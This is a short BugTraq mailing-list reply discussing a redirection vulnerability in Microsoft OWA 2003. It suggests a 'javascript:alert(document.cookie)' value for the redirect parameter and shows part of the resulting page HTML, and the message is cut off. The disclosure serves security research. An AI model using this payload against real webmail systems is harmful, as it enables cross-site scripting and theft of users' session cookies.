Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Re: MS OWA 2003 Redirection Vulnerability Oct 15 2008 05:51PM
Stefano Di Paola (stefano dipaola wisec it)
Did you try setting it to :

javascript:alert(document.cookie)

If there are no/dumb filters you'll get

<!--Copyright (c) 2000-2003 Microsoft Corporation. All rights
reserved.-->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<html><head>
<script>
try
{
window.location = ...

[ more ]  




 

Privacy Statement
Copyright 2009, SecurityFocus